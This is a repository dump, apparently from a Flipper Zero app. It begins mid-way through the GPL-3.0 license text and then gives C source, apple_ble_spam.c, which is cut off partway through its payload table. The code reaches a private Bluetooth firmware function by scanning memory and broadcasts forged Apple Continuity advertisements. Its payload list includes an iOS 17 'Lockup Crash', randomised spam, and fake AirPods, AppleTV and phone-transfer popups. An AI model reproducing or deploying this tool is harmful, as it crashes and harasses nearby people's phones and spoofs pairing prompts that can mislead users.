you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /apple_ble_spam.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "apple_ble_spam_icons.h" 7 | #include "lib/continuity/continuity.h" 8 | 9 | typedef struct { 10 | const char* title; 11 | const char* text; 12 | bool random; 13 | ContinuityMsg msg; 14 | } Payload; 15 | 16 | // NAPI 17 | // TODO: Use __attribute__((aligned(2))) instead? 18 | // TODO: Use an offset of the base address? 19 | 20 | #define TAG "FuriHalBt" 21 | #define BLE_STATUS_TIMEOUT 0xFFU 22 | #define BLE_CMD_MAX_PARAM_LEN 255 23 | 24 | typedef uint8_t tBleStatus; 25 | 26 | typedef __PACKED_STRUCT { 27 | uint8_t Adv_Data_Length; 28 | uint8_t Adv_Data[BLE_CMD_MAX_PARAM_LEN - 1]; 29 | } 30 | aci_gap_additional_beacon_set_data_cp0; 31 | 32 | typedef __PACKED_STRUCT { 33 | uint16_t Adv_Interval_Min; 34 | uint16_t Adv_Interval_Max; 35 | uint8_t Adv_Channel_Map; 36 | uint8_t Own_Address_Type; 37 | uint8_t Own_Address[6]; 38 | uint8_t PA_Level; 39 | } 40 | aci_gap_additional_beacon_start_cp0; 41 | 42 | struct hci_request { 43 | uint16_t ogf; 44 | uint16_t ocf; 45 | int event; 46 | void* cparam; 47 | int clen; 48 | void* rparam; 49 | int rlen; 50 | }; 51 | 52 | #define HCI_SEND_REQ_ADDR 0x080161e8 53 | #define TARGET_SEQUENCE 0x33680446 54 | #define SEQUENCE_OFFSET 6 55 | #define START_ADDR 0x8000140 56 | #define END_ADDR 0x80800ec 57 | 58 | uintptr_t* scan_memory_for_sequence(uint32_t sequence) { 59 | uint8_t* addr; 60 | uint8_t* target_bytes = (uint8_t*)&sequence; 61 | 62 | for(addr = (uint8_t*)START_ADDR; addr < (uint8_t*)END_ADDR - 3; addr++) { 63 | if(addr[0] == target_bytes[3] && addr[1] == target_bytes[2] && 64 | addr[2] == target_bytes[1] && addr[3] == target_bytes[0]) { 65 | return (uintptr_t*)(addr - SEQUENCE_OFFSET); 66 | } 67 | } 68 | return (uintptr_t*)HCI_SEND_REQ_ADDR; // If not found, default to 0.90.1 OFW offset 69 | } 70 | 71 | int (*napi_hci_send_req)(struct hci_request* p_cmd, uint8_t async) = NULL; 72 | 73 | void* Osal_MemCpy(void* dest, const void* src, unsigned int size) { 74 | return memcpy(dest, src, size); 75 | } 76 | 77 | void* Osal_MemSet(void* ptr, int value, unsigned int size) { 78 | return memset(ptr, value, size); 79 | } 80 | 81 | tBleStatus aci_gap_additional_beacon_start( 82 | uint16_t Adv_Interval_Min, 83 | uint16_t Adv_Interval_Max, 84 | uint8_t Adv_Channel_Map, 85 | uint8_t Own_Address_Type, 86 | const uint8_t* Own_Address, 87 | uint8_t PA_Level) { 88 | struct hci_request rq; 89 | uint8_t cmd_buffer[BLE_CMD_MAX_PARAM_LEN]; 90 | aci_gap_additional_beacon_start_cp0* cp0 = (aci_gap_additional_beacon_start_cp0*)(cmd_buffer); 91 | tBleStatus status = 0; 92 | int index_input = 0; 93 | cp0->Adv_Interval_Min = Adv_Interval_Min; 94 | index_input += 2; 95 | cp0->Adv_Interval_Max = Adv_Interval_Max; 96 | index_input += 2; 97 | cp0->Adv_Channel_Map = Adv_Channel_Map; 98 | index_input += 1; 99 | cp0->Own_Address_Type = Own_Address_Type; 100 | index_input += 1; 101 | Osal_MemCpy((void*)&cp0->Own_Address, (const void*)Own_Address, 6); 102 | index_input += 6; 103 | cp0->PA_Level = PA_Level; 104 | index_input += 1; 105 | Osal_MemSet(&rq, 0, sizeof(rq)); 106 | rq.ogf = 0x3f; 107 | rq.ocf = 0x0b0; 108 | rq.cparam = cmd_buffer; 109 | rq.clen = index_input; 110 | rq.rparam = &status; 111 | rq.rlen = 1; 112 | if(napi_hci_send_req(&rq, 0) < 0) return BLE_STATUS_TIMEOUT; 113 | return status; 114 | } 115 | 116 | tBleStatus aci_gap_additional_beacon_stop(void) { 117 | struct hci_request rq; 118 | tBleStatus status = 0; 119 | Osal_MemSet(&rq, 0, sizeof(rq)); 120 | rq.ogf = 0x3f; 121 | rq.ocf = 0x0b1; 122 | rq.rparam = &status; 123 | rq.rlen = 1; 124 | if(napi_hci_send_req(&rq, 0) < 0) return BLE_STATUS_TIMEOUT; 125 | return status; 126 | } 127 | 128 | tBleStatus aci_gap_additional_beacon_set_data(uint8_t Adv_Data_Length, const uint8_t* Adv_Data) { 129 | struct hci_request rq; 130 | uint8_t cmd_buffer[BLE_CMD_MAX_PARAM_LEN]; 131 | aci_gap_additional_beacon_set_data_cp0* cp0 = 132 | (aci_gap_additional_beacon_set_data_cp0*)(cmd_buffer); 133 | tBleStatus status = 0; 134 | int index_input = 0; 135 | cp0->Adv_Data_Length = Adv_Data_Length; 136 | index_input += 1; 137 | Osal_MemCpy((void*)&cp0->Adv_Data, (const void*)Adv_Data, Adv_Data_Length); 138 | index_input += Adv_Data_Length; 139 | Osal_MemSet(&rq, 0, sizeof(rq)); 140 | rq.ogf = 0x3f; 141 | rq.ocf = 0x0b2; 142 | rq.cparam = cmd_buffer; 143 | rq.clen = index_input; 144 | rq.rparam = &status; 145 | rq.rlen = 1; 146 | if(napi_hci_send_req(&rq, 0) < 0) return BLE_STATUS_TIMEOUT; 147 | return status; 148 | } 149 | 150 | bool napi_furi_hal_bt_custom_adv_set(const uint8_t* adv_data, size_t adv_len) { 151 | tBleStatus status = aci_gap_additional_beacon_set_data(adv_len, adv_data); 152 | if(status) { 153 | FURI_LOG_E(TAG, "custom_adv_set failed %d", status); 154 | return false; 155 | } else { 156 | FURI_LOG_D(TAG, "custom_adv_set success"); 157 | return true; 158 | } 159 | } 160 | 161 | bool napi_furi_hal_bt_custom_adv_start( 162 | uint16_t min_interval, 163 | uint16_t max_interval, 164 | uint8_t mac_type, 165 | const uint8_t mac_addr[GAP_MAC_ADDR_SIZE], 166 | uint8_t power_amp_level) { 167 | tBleStatus status = aci_gap_additional_beacon_start( 168 | (double)(min_interval / 0.625), // Millis to gap time 169 | (double)(max_interval / 0.625), // Millis to gap time 170 | 0b00000111, // All 3 channels 171 | mac_type, 172 | mac_addr, 173 | power_amp_level); 174 | if(status) { 175 | FURI_LOG_E(TAG, "custom_adv_start failed %d", status); 176 | return false; 177 | } else { 178 | FURI_LOG_D(TAG, "custom_adv_start success"); 179 | return true; 180 | } 181 | } 182 | 183 | bool napi_furi_hal_bt_custom_adv_stop() { 184 | tBleStatus status = aci_gap_additional_beacon_stop(); 185 | if(status) { 186 | FURI_LOG_E(TAG, "custom_adv_stop failed %d", status); 187 | return false; 188 | } else { 189 | FURI_LOG_D(TAG, "custom_adv_stop success"); 190 | return true; 191 | } 192 | } 193 | 194 | // Hacked together by @Willy-JL 195 | // Custom adv logic by @Willy-JL (idea by @xMasterX) 196 | // iOS 17 Crash by @ECTO-1A 197 | // Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A 198 | // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ 199 | // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ 200 | // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam 201 | 202 | static Payload 203 | payloads[] = 204 | { 205 | #if false 206 | {.title = "AirDrop", 207 | .text = "", 208 | .random = false, 209 | .msg = 210 | { 211 | .type = ContinuityTypeAirDrop, 212 | .data = {.airdrop = {}}, 213 | }}, 214 | {.title = "Airplay Target", 215 | .text = "", 216 | .random = false, 217 | .msg = 218 | { 219 | .type = ContinuityTypeAirplayTarget, 220 | .data = {.airplay_target = {}}, 221 | }}, 222 | {.title = "Handoff", 223 | .text = "", 224 | .random = false, 225 | .msg = 226 | { 227 | .type = ContinuityTypeHandoff, 228 | .data = {.handoff = {}}, 229 | }}, 230 | {.title = "Tethering Source", 231 | .text = "", 232 | .random = false, 233 | .msg = 234 | { 235 | .type = ContinuityTypeTetheringSource, 236 | .data = {.tethering_source = {}}, 237 | }}, 238 | {.title = "Mobile Backup", 239 | .text = "", 240 | .random = false, 241 | .msg = 242 | { 243 | .type = ContinuityTypeNearbyAction, 244 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x04}}, 245 | }}, 246 | {.title = "Watch Setup", 247 | .text = "", 248 | .random = false, 249 | .msg = 250 | { 251 | .type = ContinuityTypeNearbyAction, 252 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x05}}, 253 | }}, 254 | {.title = "Internet Relay", 255 | .text = "", 256 | .random = false, 257 | .msg = 258 | { 259 | .type = ContinuityTypeNearbyAction, 260 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x07}}, 261 | }}, 262 | {.title = "WiFi Password", 263 | .text = "", 264 | .random = false, 265 | .msg = 266 | { 267 | .type = ContinuityTypeNearbyAction, 268 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x08}}, 269 | }}, 270 | {.title = "Repair", 271 | .text = "", 272 | .random = false, 273 | .msg = 274 | { 275 | .type = ContinuityTypeNearbyAction, 276 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x0A}}, 277 | }}, 278 | {.title = "Apple Pay", 279 | .text = "", 280 | .random = false, 281 | .msg = 282 | { 283 | .type = ContinuityTypeNearbyAction, 284 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x0C}}, 285 | }}, 286 | {.title = "Developer Tools Pairing Request", 287 | .text = "", 288 | .random = false, 289 | .msg = 290 | { 291 | .type = ContinuityTypeNearbyAction, 292 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x0E}}, 293 | }}, 294 | {.title = "Answered Call", 295 | .text = "", 296 | .random = false, 297 | .msg = 298 | { 299 | .type = ContinuityTypeNearbyAction, 300 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x0F}}, 301 | }}, 302 | {.title = "Ended Call", 303 | .text = "", 304 | .random = false, 305 | .msg = 306 | { 307 | .type = ContinuityTypeNearbyAction, 308 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x10}}, 309 | }}, 310 | {.title = "DD Ping", 311 | .text = "", 312 | .random = false, 313 | .msg = 314 | { 315 | .type = ContinuityTypeNearbyAction, 316 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x11}}, 317 | }}, 318 | {.title = "DD Pong", 319 | .text = "", 320 | .random = false, 321 | .msg = 322 | { 323 | .type = ContinuityTypeNearbyAction, 324 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x12}}, 325 | }}, 326 | {.title = "Companion Link Proximity", 327 | .text = "", 328 | .random = false, 329 | .msg = 330 | { 331 | .type = ContinuityTypeNearbyAction, 332 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x14}}, 333 | }}, 334 | {.title = "Remote Management", 335 | .text = "", 336 | .random = false, 337 | .msg = 338 | { 339 | .type = ContinuityTypeNearbyAction, 340 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x15}}, 341 | }}, 342 | {.title = "Remote Auto Fill Pong", 343 | .text = "", 344 | .random = false, 345 | .msg = 346 | { 347 | .type = ContinuityTypeNearbyAction, 348 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x16}}, 349 | }}, 350 | {.title = "Remote Display", 351 | .text = "", 352 | .random = false, 353 | .msg = 354 | { 355 | .type = ContinuityTypeNearbyAction, 356 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x17}}, 357 | }}, 358 | {.title = "Nearby Info", 359 | .text = "", 360 | .random = false, 361 | .msg = 362 | { 363 | .type = ContinuityTypeNearbyInfo, 364 | .data = {.nearby_info = {}}, 365 | }}, 366 | #endif 367 | {.title = "Lockup Crash", 368 | .text = "iOS 17, locked, long range", 369 | .random = false, 370 | .msg = 371 | { 372 | .type = ContinuityTypeCustomCrash, 373 | .data = {.custom_crash = {}}, 374 | }}, 375 | {.title = "Random Action", 376 | .text = "Spam shuffle Nearby Actions", 377 | .random = true, 378 | .msg = 379 | { 380 | .type = ContinuityTypeNearbyAction, 381 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x00}}, 382 | }}, 383 | {.title = "Random Pair", 384 | .text = "Spam shuffle Proximity Pairs", 385 | .random = true, 386 | .msg = 387 | { 388 | .type = ContinuityTypeProximityPair, 389 | .data = {.proximity_pair = {.prefix = 0x00, .model = 0x0000}}, 390 | }}, 391 | {.title = "AppleTV AutoFill", 392 | .text = "Banner, unlocked, long range", 393 | .random = false, 394 | .msg = 395 | { 396 | .type = ContinuityTypeNearbyAction, 397 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x13}}, 398 | }}, 399 | {.title = "AppleTV Connecting...", 400 | .text = "Modal, unlocked, long range", 401 | .random = false, 402 | .msg = 403 | { 404 | .type = ContinuityTypeNearbyAction, 405 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x27}}, 406 | }}, 407 | {.title = "Join This AppleTV?", 408 | .text = "Modal, unlocked, spammy", 409 | .random = false, 410 | .msg = 411 | { 412 | .type = ContinuityTypeNearbyAction, 413 | .data = {.nearby_action = {.flags = 0xBF, .type = 0x20}}, 414 | }}, 415 | {.title = "AppleTV Audio Sync", 416 | .text = "Banner, locked, long range", 417 | .random = false, 418 | .msg = 419 | { 420 | .type = ContinuityTypeNearbyAction, 421 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x19}}, 422 | }}, 423 | {.title = "AppleTV Color Balance", 424 | .text = "Banner, locked", 425 | .random = false, 426 | .msg = 427 | { 428 | .type = ContinuityTypeNearbyAction, 429 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x1E}}, 430 | }}, 431 | {.title = "Setup New iPhone", 432 | .text = "Modal, locked", 433 | .random = false, 434 | .msg = 435 | { 436 | .type = ContinuityTypeNearbyAction, 437 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x09}}, 438 | }}, 439 | {.title = "Setup New Random", 440 | .text = "Modal, locked, glitched", 441 | .random = false, 442 | .msg = 443 | { 444 | .type = ContinuityTypeNearbyAction, 445 | .data = {.nearby_action = {.flags = 0x40, .type = 0x09}}, 446 | }}, 447 | {.title = "Transfer Phone Number", 448 | .text = "Modal, locked", 449 | .random = false, 450 | .msg = 451 | { 452 | .type = ContinuityTypeNearbyAction, 453 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x02}}, 454 | }}, 455 | {.title = "HomePod Setup", 456 | .text = "Modal, unlocked", 457 | .random = false, 458 | .msg = 459 | { 460 | .type = ContinuityTypeNearbyAction, 461 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x0B}}, 462 | }}, 463 | {.title = "AirPods Pro", 464 | .text = "Modal, spammy (auto close)", 465 | .random = false, 466 | .msg = 467 | { 468 | .type = ContinuityTypeProximityPair, 469 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0E20}}, 470 | }}, 471 | {.title = "Beats Solo 3", 472 | .text = "Modal, spammy (stays open)", 473 | .random = false, 474 | .msg = 475 | { 476 | .type = ContinuityTypeProximityPair, 477 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0620}}, 478 | }}, 479 | {.title = "AirPods Max", 480 | .text = "Modal, laggy (stays open)", 481 | .random = false, 482 | .msg = 483 | { 484 | .type = ContinuityTypeProximityPair, 485 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0A20}}, 486 | }}, 487 | {.title = "Beats Flex", 488 | .text = "Modal, laggy (stays open)", 489 | .random = false, 490 | .msg = 491 | { 492 | .type = ContinuityTypeProximityPair, 493 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1020}}, 494 | }}, 495 | {.title = "Airtag", 496 | .text = "Modal, unlocked", 497 | .random = false, 498 | .msg = 499 | { 500 | .type = ContinuityTypeProximityPair, 501 | .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0055}}, 502 | }}, 503 | {.title = "Hermes Airtag", 504 | .text = "", 505 | .random = false, 506 | .msg = 507 | { 508 | .type = ContinuityTypeProximityPair, 509 | .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0030}}, 510 | }}, 511 | {.title = "Setup New AppleTV", 512 | .text = "Modal, unlocked", 513 | .random = false, 514 | .msg = 515 | { 516 | .type = ContinuityTypeNearbyAction, 517 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x01}}, 518 | }}, 519 | {.title = "Pair AppleTV", 520 | .text = "Modal, unlocked", 521 | .random = false, 522 | .msg = 523 | { 524 | .type = ContinuityTypeNearbyAction, 525 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x06}}, 526 | }}, 527 | {.title = "HomeKit AppleTV Setup", 528 | .text = "Modal, unlocked", 529 | .random = false, 530 | .msg = 531 | { 532 | .type = ContinuityTypeNearbyAction, 533 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x0D}}, 534 | }}, 535 | {.title = "AppleID for AppleTV?", 536 | .text = "Modal, unlocked", 537 | .random = false, 538 | .msg = 539 | { 540 | .type = ContinuityTypeNearbyAction, 541 | .data = {.nearby_action = {.flags = 0xC0, .type = 0x2B}}, 542 | }}, 543 | {.title = "AirPods", 544 | .text = "Modal, spammy (auto close)", 545 | .random = false, 546 | .msg = 547 | { 548 | .type = ContinuityTypeProximityPair, 549 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0220}}, 550 | }}, 551 | {.title = "AirPods 2nd Gen", 552 | .text = "Modal, spammy (auto close)", 553 | .random = false, 554 | .msg = 555 | { 556 | .type = ContinuityTypeProximityPair, 557 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0F20}}, 558 | }}, 559 | {.title = "AirPods 3rd Gen", 560 | .text = "Modal, spammy (auto close)", 561 | .random = false, 562 | .msg = 563 | { 564 | .type = ContinuityTypeProximityPair, 565 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1320}}, 566 | }}, 567 | {.title = "AirPods Pro 2nd Gen", 568 | .text = "Modal, spammy (auto close)", 569 | .random = false, 570 | .msg = 571 | { 572 | .type = ContinuityTypeProximityPair, 573 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1420}}, 574 | }}, 575 | {.title = "Powerbeats 3", 576 | .text = "Modal, spammy (stays open)", 577 | .random = false, 578 | .msg = 579 | { 580 | .type = ContinuityTypeProximityPair, 581 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0320}}, 582 | }}, 583 | {.title = "Powerbeats Pro", 584 | .text = "Modal, spammy (auto close)", 585 | .random = false, 586 | .msg = 587 | { 588 | .type = ContinuityTypeProximityPair, 589 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0B20}}, 590 | }}, 591 | {.title = "Beats Solo Pro", 592 | .text = "", 593 | .random = false, 594 | .msg = 595 | { 596 | .type = ContinuityTypeProximityPair, 597 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0C20}}, 598 | }}, 599 | {.title = "Beats Studio Buds", 600 | .text = "Modal, spammy (auto close)", 601 | .random = false, 602 | .msg = 603 | { 604 | .type = ContinuityTypeProximityPair, 605 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1120}}, 606 | }}, 607 | {.title = "Beats X", 608 | .text = "Modal, spammy (stays open)", 609 | .random = false, 610 | .msg = 611 | { 612 | .type = ContinuityTypeProximityPair, 613 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0520}}, 614 | }}, 615 | {.title = "Beats Studio 3", 616 | .text = "Modal, spammy (stays open)", 617 | .random = false, 618 | .msg = 619 | { 620 | .type = ContinuityTypeProximityPair, 621 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0920}}, 622 | }}, 623 | {.title = "Beats Studio Pro", 624 | .text = "Modal, spammy (stays open)", 625 | .random = false, 626 | .msg = 627 | { 628 | .type = ContinuityTypeProximityPair, 629 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1720}}, 630 | }}, 631 | {.title = "Beats Fit Pro", 632 | .text = "Modal, spammy (auto close)", 633 | .random = false, 634 | .msg = 635 | { 636 | .type = ContinuityTypeProximityPair, 637 | .data = 